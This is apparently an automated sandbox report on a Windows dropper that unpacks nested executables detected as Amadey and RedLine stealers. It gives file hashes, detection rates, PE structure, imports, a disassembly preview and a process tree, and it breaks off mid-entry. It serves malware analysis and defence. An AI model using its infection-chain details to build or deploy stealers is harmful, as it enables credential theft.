Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 84%, Browse
Joe Sandbox View:	Filename: j8OyCuPzJD.exe, Detection: malicious, Browse Filename: gGz6hXsQ5z.exe, Detection: malicious, Browse Filename: ZXcrrc9u12.exe, Detection: malicious, Browse Filename: 2ZWTFBumFH.exe, Detection: malicious, Browse Filename: QEjCVy6niV.exe, Detection: malicious, Browse Filename: ad9ffe0b58f2.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: tZ8P3TRdFa.exe, Detection: malicious, Browse Filename: V28mWj6WVa.exe, Detection: malicious, Browse Filename: Fzm8qTgKaa.exe, Detection: malicious, Browse Filename: z5iTPC1sT2.exe, Detection: malicious, Browse Filename: HkYl8K3mLN.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: JlbJfLNR4d.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L...:[.d............................Ut............@.......................................@.................................xp..d................................(..pC..p....................D.......C..@............................................text............................... ..`.rdata.. ...........................@..@.data...H'...........j..............@....rsrc...............................@..@.reloc...(.......*..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe

Download File

Process:	C:\Users\user\Desktop\plEnknXWQD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	872960
Entropy (8bit):	7.906390008144435
Encrypted:	false
SSDEEP:	12288:gMrny90bdCMdtDU2IwSdU+L6bNCD0L+W9ow/ZQ0wXQw4760VC8Dpem9s97AY/:XycURwXTNY0iWKrLQNCyHS7z/
MD5:	52B9E7C5A314A3E0BD0AF989586DE77B
SHA1:	3A5D97D5A5F3305F588A8502010A10B51D43E37B
SHA-256:	89AC16F365BEC445048564B247F8B944D8D77C2A8EACE099F72F9EC171921B66
SHA-512:	0CBE1D225D48AFBF66424137A51BB3EF9BF2B7C4F52B059154E692624EBAC7387C5740267D29CB9D96C65400B4DFBCB18140FFF0E2D8453892032F6F9E0DACE6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70% Antivirus: Virustotal, Detection: 55%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.......................................@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc...............H..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	179200
Entropy (8bit):	4.95425936878501
Encrypted:	false
SSDEEP:	3072:VxqZWjfa8oty3QqECU8eUcFShTnxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOuu:fqZCQqElPSh
MD5:	3389637C0D072121BF1B127629736D37
SHA1:	300E915EFDF2479BFD0D3699C0A6BC51260F9655
SHA-256:	2B74C4CE2674A8FC0C78FFFA39C5DE5E43AE28B8BF425349A5F97C6A61135153
SHA-512:	A32CC060D2600F6CA94FFDCE07C95EA5E2F56C0B418260456B568CB41E5F55DB0C4FC97C35CA4103C674E61A17300D834D2C0DA5A78B7084B6BC342FD23A7FB4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 73% Antivirus: Virustotal, Detection: 76%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@.................................8...O.......,............................................................................ ............... ..H............text....... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	724480
Entropy (8bit):	7.877478908934754
Encrypted:	false
SSDEEP:	12288:nMrLy90XhUZyfdU+LeVcCK0O+Wxow//9K4IBrOh+KCRDsam9F97I:YyXZyKdcJ0VWeoqSCqjt7I
MD5:	7543D15869BB6AF00305F1C7BA4F6B49
SHA1:	CFC7F936A31F5B9FB124230EC3CC9A5A0A64099E
SHA-256:	5F27709F089A646DABE6FEF0B51CC808E785C4DE385B30231B00CCF146ABCB7B
SHA-512:	099A9B3ABFC8CAC05BF0655735EC87D5F7D226E84320A6910ED1A30FE695EA8F09837D56F8F95E91092E9E4AA6BA6C9772544BD510D0A7147D087E5A21C0261C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 64% Antivirus: Virustotal, Detection: 55%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................`............@...... ...........................................................P..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	400896
Entropy (8bit):	6.799077893289741
Encrypted:	false
SSDEEP:	6144:OpBL6vPRiUryaNB5HC6XkN9UomaZ4RPDNr:OpBGvPIUOaThCpDTQr
MD5:	046BA85B86059ACD742BE1DE5448233B
SHA1:	073531374021E722203FE0766794F417FA9B51AF
SHA-256:	F8E7A702DBE3BFA707D53049267F7AE41DDAF22ABBA381892F8303151D9B2BEE
SHA-512:	2F8BFBDE57935AD3AD8801E3568CACA11DA0FE6582D70BB1FBBFE517A2E0326B485119A92E6872D52A8B77C38031090F13AEB4F2599D781B15C3B19B4A5471AE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46% Antivirus: Virustotal, Detection: 51%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L.....b......................m......P............@.......................... q.................................................d.....n.......................p.....................................x-..@............................................text............................... ..`.data...H.j......&..................@....rsrc.........n.....................@..@.reloc..x.....p.....................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	362496
Entropy (8bit):	7.661331846748842
Encrypted:	false
SSDEEP:	6144:Koy+bnr+fp0yN90QEwmwkVq0x142x9Q4lJEyl0Cr4x+WeQYLwzT/XNmz:QMrTy90Fzv4ACK0R+WLow//dG
MD5:	941C83F4C8AD9D1112BFC556CFA74167
SHA1:	33562464DA86FEE0C267ABF350A13720D4F3E676
SHA-256:	982488AC3B18055B19392EA1D59A2D83F508EFD6B0A9F14F67D15ABDCCE22368
SHA-512:	57DFFA208E760EAFE0C684B105E05A6669F0757CDA38D24E127D0ECCE04DC63DE4B66A393A1BB48916C560D4C8E7C7C01CD334E1CD2C637763C1F2002BC9B024
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 64%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d... ......`j............@.................................G.....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc...............~..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.97029807367379
Encrypted:	false
SSDEEP:	96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:	7E93BACBBC33E6652E147E7FE07572A0
SHA1:	421A7167DA01C8DA4DC4D5234CA3DD84E319E762
SHA-256:	850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
SHA-512:	250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................@......H.......T$...............................................................0...........@s.....@...(....&..0..K......... ?...(......~....(....,.r...p.....(....%..(....& ....(....(....&.(....&..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-..(....&(.....o....(....&..X....i2..(....&....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-..(....&.o....(....&..X....i2..(....&.0..c......... ?...(......~....(....,.*....(............%...(...

C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	341504
Entropy (8bit):	6.481868598519912
Encrypted:	false
SSDEEP:	6144:nZ3LYwHUxsB2a9D4lJERA0Cr4x+WBQYLwzAW0nr:nZ38wHU2BsCi0R+Weowar
MD5:	79CBBF32E2376C4CADB2DFAD0ED320FA
SHA1:	6BA6E52F1E7C73FFC92864B9B63710934D4C9E00
SHA-256:	6DFB051F61149894BE7702ACF73AD1592C997C9362AC6DA1DA6526A0E2E77AEE
SHA-512:	120409D7D975BF694C001F97C577D7AAE41341F78268DAFF26622F4ABF93F8DF831141B7DDD99713C7F302503FD1A009BB37464845EA0432CCC2C79F4DEE3DC2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L......a......................m......P............@..........................0p.....g5..........................................d.....n.......................o.....................................x-..@............................................text............................... ..`.data...H.j......&..................@....rsrc.........n.....................@..@.reloc..x.....o.....................@..B........................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.930307188666943
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	plEnknXWQD.exe
File size:	1063936
MD5:	548ee02a30c2dcca5f3f91e90212ec29
SHA1:	cff21359a3498e3f3e8def5c553a626363b49922
SHA256:	3b6171920a1c00a384ac77f88d94b78d960bd317efc531748893edcd579e370e
SHA512:	4f7be3d30ebd73bdd88a07601edfa7e83198338625f1769fba3ce764d6517662f64189830f56d1711590293f5acf89ab238027f2c4997aba546f19523e3e747a
SSDEEP:	24576:WyapzRm+tB1T6qkoY0/WavTQmaHHT7o2cKC:lapFfT1OVt8lvTQZTRcK
TLSH:	7C352317ABF98432EC75933008F712C30A36BD906678535B639F9C1B08B1A69A636777
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.

File Icon


Icon Hash:	f8e0e4e8ecccc870

Static PE Info

General

Entrypoint:	0x406a60
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	646167cce332c1c252cdcb1839e0cf48

Entrypoint Preview

Instruction
call 00007F63D9401F05h
jmp 00007F63D9401815h
push 00000058h
push 004072B8h
call 00007F63D9401FA7h
xor ebx, ebx
mov dword ptr [ebp-20h], ebx
lea eax, dword ptr [ebp-68h]
push eax
call dword ptr [0040A184h]
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov esi, dword ptr [eax+04h]
mov edi, ebx
mov edx, 004088ACh
mov ecx, esi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007F63D940182Ah
cmp eax, esi
jne 00007F63D9401819h
xor esi, esi
inc esi
mov edi, esi
jmp 00007F63D9401822h
push 000003E8h
call dword ptr [0040A188h]
jmp 00007F63D94017E9h
xor esi, esi
inc esi
cmp dword ptr [004088B0h], esi
jne 00007F63D940181Ch
push 0000001Fh
call 00007F63D9401D3Bh
pop ecx
jmp 00007F63D940184Ch
cmp dword ptr [004088B0h], ebx
jne 00007F63D940183Eh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007F63D9401966h
pop ecx
pop ecx
test eax, eax
je 00007F63D9401829h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007F63D9401949h
mov dword ptr [004081E4h], esi
cmp dword ptr [004088B0h], esi
jne 00007F63D940182Dh
push 004010B4h
push 004010ACh
call 00007F63D9401EF5h
pop ecx
pop ecx
mov dword ptr [000088B0h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa28c	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0xfb40c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x108000	0x888	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1410	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1008	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x288	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6314	0x6400	False	0.5744140625	data	6.314163792045976	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x8000	0x1a48	0x200	False	0.609375	data	4.970639543960129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa000	0x1052	0x1200	False	0.4140625	data	5.025949912909207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0xfc000	0xfb600	False	0.9629314162729985	data	7.949387418142808	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x108000	0x888	0xa00	False	0.746484375	data	6.222637930812128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AVI	0xcb30	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States
RT_ICON	0xf94c	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States
RT_ICON	0xffb4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States
RT_ICON	0x1029c	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States
RT_ICON	0x10484	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States
RT_ICON	0x105ac	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States
RT_ICON	0x11454	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States
RT_ICON	0x11cfc	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States
RT_ICON	0x123c4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States
RT_ICON	0x1292c	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x20300	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x228a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x23950	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x242d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x24740	0x2f2	data	English	United States
RT_DIALOG	0x24a34	0x35c	data	Russian	Russia
RT_DIALOG	0x24d90	0x1b0	data	English	United States
RT_DIALOG	0x24f40	0x1b4	data	Russian	Russia
RT_DIALOG	0x250f4	0x166	data	English	United States
RT_DIALOG	0x2525c	0x168	data	Russian	Russia
RT_DIALOG	0x253c4	0x1c0	data	English	United States
RT_DIALOG	0x25584	0x1e0	data	Russian	Russia
RT_DIALOG	0x25764	0x130	data	English	United States
RT_DIALOG	0x25894	0x150	data	Russian	Russia
RT_DIALOG	0x259e4	0x120	data	English	United States
RT_DIALOG	0x25b04	0x122	data	Russian	Russia
RT_STRING	0x25c28	0x8c	Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0	English	United States
RT_STRING	0x25cb4	0x86	Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0	Russian	Russia
RT_STRING	0x25d3c	0x520	data	English	United States
RT_STRING	0x2625c	0x52e	data	Russian	Russia
RT_STRING	0x2678c	0x5cc	data	English	United States
RT_STRING	0x26d58	0x592	data	Russian	Russia
RT_STRING	0x272ec	0x4b0	data	English	United States
RT_STRING	0x2779c	0x4b2	data	Russian	Russia
RT_STRING	0x27c50	0x44a	data	English	United States
RT_STRING	0x2809c	0x43e	data	Russian	Russia
RT_STRING	0x284dc	0x3ce	data	English	United States
RT_STRING	0x288ac	0x2fc	data	Russian	Russia
RT_RCDATA	0x28ba8	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x28bb0	0xdd726	Microsoft Cabinet archive data, many, 907046 bytes, 2 files, at 0x2c +A "will6283.exe" +A "ry40VI69.exe", ID 1992, number 1, 34 datablocks, 0x1503 compression	English	United States
RT_RCDATA	0x1062d8	0x4	data	English	United States
RT_RCDATA	0x1062dc	0x24	data	English	United States
RT_RCDATA	0x106300	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x106308	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x106310	0x4	data	English	United States
RT_RCDATA	0x106314	0xd	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x106324	0x4	data	English	United States
RT_RCDATA	0x106328	0xd	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x106338	0x4	data	English	United States
RT_RCDATA	0x10633c	0x5	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x106344	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x10634c	0x7	ASCII text, with no line terminators	English	United States
RT_GROUP_ICON	0x106354	0xbc	data	English	United States
RT_VERSION	0x106410	0x408	data	English	United States
RT_VERSION	0x106818	0x410	data	Russian	Russia
RT_MANIFEST	0x106c28	0x7e2	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll	GetDeviceCaps
USER32.dll	SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll	_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll
Cabinet.dll
VERSION.dll	GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Russian	Russia

Network Behavior

Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: plEnknXWQD.exePID: 5516, Parent PID: 3324

General

Target ID:	0
Start time:	21:02:50
Start date:	18/03/2023
Path:	C:\Users\user\Desktop\plEnknXWQD.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\plEnknXWQD.exe
Imagebase:	0x380000
File size:	1063936 bytes
MD5 hash:	548EE02A30C2DCCA5F3F91E90212EC29
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.307182274.0000000004904000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: will6283.exePID: 5504, Parent PID: 5516

General

Target ID:	1
Start time:	21:02:50
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe
Imagebase:	0x1060000
File size:	872960 bytes
MD5 hash:	52B9E7C5A314A3E0BD0AF989586DE77B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 70%, ReversingLabs Detection: 55%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: will3629.exePID: 5480, Parent PID: 5504

General

Target ID:	2
Start time:	21:02:50
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe
Imagebase:	0xac0000
File size:	724480 bytes
MD5 hash:	7543D15869BB6AF00305F1C7BA4F6B49
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 64%, ReversingLabs Detection: 55%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: will3971.exePID: 5456, Parent PID: 5480

General

Target ID:	3
Start time:	21:02:51
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe
Imagebase:	0x2f0000
File size:	362496 bytes
MD5 hash:	941C83F4C8AD9D1112BFC556CFA74167
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 64%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mx8896IL.exePID: 5584, Parent PID: 5456

General

Target ID:	4
Start time:	21:02:51
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe
Imagebase:	0xe00000
File size:	11264 bytes
MD5 hash:	7E93BACBBC33E6652E147E7FE07572A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5612, Parent PID: 3324

General

Target ID:	5
Start time:	21:03:02
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff7c6ff0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: ns5251Ks.exePID: 5660, Parent PID: 5456

General

Target ID:	6
Start time:	21:03:03
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe
Wow64 process (32bit):	true
